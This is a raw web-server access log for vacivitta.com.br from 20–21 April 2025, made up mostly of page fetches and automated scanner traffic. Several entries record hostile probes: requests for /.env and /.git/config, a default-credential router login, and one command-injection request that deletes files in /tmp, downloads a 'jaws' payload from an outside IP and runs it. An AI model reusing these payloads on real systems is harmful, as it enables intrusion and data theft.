154.81.156.54 - - [20/Apr/2025:15:28:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
196.251.71.168 - - [20/Apr/2025:15:45:10 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
196.251.71.168 - - [20/Apr/2025:15:45:11 -0300] "GET /wp-content/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:15:47:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:16:02:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [20/Apr/2025:16:07:54 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
80.75.212.115 - - [20/Apr/2025:16:11:54 -0300] "CONNECT pro.ip-api.com:443 HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:16:17:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
117.235.29.40 - - [20/Apr/2025:16:28:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:16:41:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
193.233.48.55 - - [20/Apr/2025:16:46:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:16:47:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [20/Apr/2025:16:56:40 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:17:01:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
20.169.104.218 - - [20/Apr/2025:17:03:38 -0300] "GET /hudson HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:17:19:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [20/Apr/2025:17:22:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:17:34:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.20 - - [20/Apr/2025:17:53:30 -0300] "-" 408 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:17:58:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
192.241.176.195 - - [20/Apr/2025:18:01:57 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
192.241.176.195 - - [20/Apr/2025:18:01:57 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:18:12:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
90.189.112.148 - - [20/Apr/2025:18:13:01 -0300] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1" 404 - "-" "Hello, world"
vacivitta.com.br:80
101.36.108.191 - - [20/Apr/2025:18:18:17 -0300] "GET / HTTP/1.1" 200 488 "-" "curl/7.29.0"
vacivitta.com.br:80
101.36.108.191 - - [20/Apr/2025:18:18:18 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
101.36.108.191 - - [20/Apr/2025:18:18:18 -0300] "t3 12.1.2\n" 404 - "-" "-"
vacivitta.com.br:80
152.32.128.214 - - [20/Apr/2025:18:18:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 8_0_1; Win64; x64) AppleWebKit/558.47 (KHTML, like Gecko) Chrome/87.0.1757 Safari/537.36"
vacivitta.com.br:80
152.32.128.214 - - [20/Apr/2025:18:18:34 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Go-http-client/1.1"
vacivitta.com.br:80
152.32.128.214 - - [20/Apr/2025:18:18:35 -0300] "GET /assets/index-DogtGhmX.js HTTP/1.1" 200 839022 "-" "Go-http-client/1.1"
vacivitta.com.br:80
152.32.128.214 - - [20/Apr/2025:18:18:37 -0300] "GET /sitemap.xml HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
152.32.128.214 - - [20/Apr/2025:18:18:37 -0300] "GET /robots.txt HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:18:22:43 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:18:44:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
119.203.11.243 - - [20/Apr/2025:18:46:32 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:18:58:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:19:10:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
103.133.111.213 - - [20/Apr/2025:19:11:37 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
103.133.111.213 - - [20/Apr/2025:19:11:37 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
123.129.134.173 - - [20/Apr/2025:19:24:58 -0300] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:19:42:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
162.142.125.46 - - [20/Apr/2025:19:50:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
162.142.125.46 - - [20/Apr/2025:19:50:39 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
162.142.125.46 - - [20/Apr/2025:19:50:43 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
162.142.125.46 - - [20/Apr/2025:19:50:45 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
162.142.125.46 - - [20/Apr/2025:19:50:53 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
162.142.125.46 - - [20/Apr/2025:19:50:55 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:19:52:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:19:59:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
35.195.81.190 - - [20/Apr/2025:20:06:40 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
34.221.168.196 - - [20/Apr/2025:20:13:06 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "python-requests/2.25.1"
vacivitta.com.br:80
185.218.86.4 - - [20/Apr/2025:20:21:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:20:25:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:20:43:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:20:51:26 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:21:08:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:21:25:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [20/Apr/2025:21:34:28 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:21:35:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:21:56:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
20.65.193.150 - - [20/Apr/2025:21:58:05 -0300] "GET /druid/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:22:04:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
45.43.33.218 - - [20/Apr/2025:22:06:44 -0300] "\x16\x03\x03\x01\xa8\x01" 404 - "-" "-"
vacivitta.com.br:80
45.43.33.218 - - [20/Apr/2025:22:06:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:22:15:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:22:16:24 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
185.242.226.154 - - [20/Apr/2025:22:26:43 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:22:27:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:22:35:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:22:42:48 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:22:54:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
64.62.156.21 - - [20/Apr/2025:22:59:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
vacivitta.com.br:80
64.62.156.15 - - [20/Apr/2025:23:03:32 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
vacivitta.com.br:80
64.62.156.11 - - [20/Apr/2025:23:04:20 -0300] "GET /geoserver/web/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
vacivitta.com.br:80
185.218.86.4 - - [20/Apr/2025:23:22:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:23:23:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [20/Apr/2025:23:29:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:23:42:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [20/Apr/2025:23:56:39 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [20/Apr/2025:23:59:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
164.52.24.188 - - [21/Apr/2025:00:08:02 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
164.52.24.188 - - [21/Apr/2025:00:08:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [21/Apr/2025:00:08:22 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
164.52.24.188 - - [21/Apr/2025:00:08:25 -0300] "GET /v1/models HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [21/Apr/2025:00:08:29 -0300] "GET /v1/models HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [21/Apr/2025:00:08:32 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [21/Apr/2025:00:08:35 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
164.52.24.188 - - [21/Apr/2025:00:08:38 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
vacivitta.com.br:80
20.65.194.54 - - [21/Apr/2025:00:12:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:00:30:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
66.240.205.34 - - [21/Apr/2025:00:39:31 -0300] "Gh0st\xad" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:00:50:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [21/Apr/2025:00:53:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
69.164.213.157 - - [21/Apr/2025:00:55:43 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
69.164.213.157 - - [21/Apr/2025:00:57:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML"
vacivitta.com.br:80
69.164.213.157 - - [21/Apr/2025:00:57:07 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML"
vacivitta.com.br:80
69.164.213.157 - - [21/Apr/2025:00:57:16 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
69.164.213.157 - - [21/Apr/2025:00:57:28 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
69.164.213.157 - - [21/Apr/2025:00:57:28 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:01:11:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
198.235.24.201 - - [21/Apr/2025:01:18:33 -0300] "GET / HTTP/1.0" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
185.255.122.19 - - [21/Apr/2025:01:36:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:01:37:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:01:44:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:02:20:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.255.122.19 - - [21/Apr/2025:02:24:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:02:35:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [21/Apr/2025:02:46:48 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:02:50:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
92.223.86.16 - - [21/Apr/2025:02:55:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
vacivitta.com.br:80
92.223.86.16 - - [21/Apr/2025:02:55:09 -0300] "GET /assets/index-DogtGhmX.js HTTP/1.1" 200 839022 "-" "python-httpx/0.28.1"
vacivitta.com.br:80
80.75.212.115 - - [21/Apr/2025:03:13:36 -0300] "CONNECT pro.ip-api.com:443 HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
185.255.122.19 - - [21/Apr/2025:03:17:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:03:22:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:03:40:48 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:03:54:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:14 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:14 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:14 -0300] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:14 -0300] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:14 -0300] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:15 -0300] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
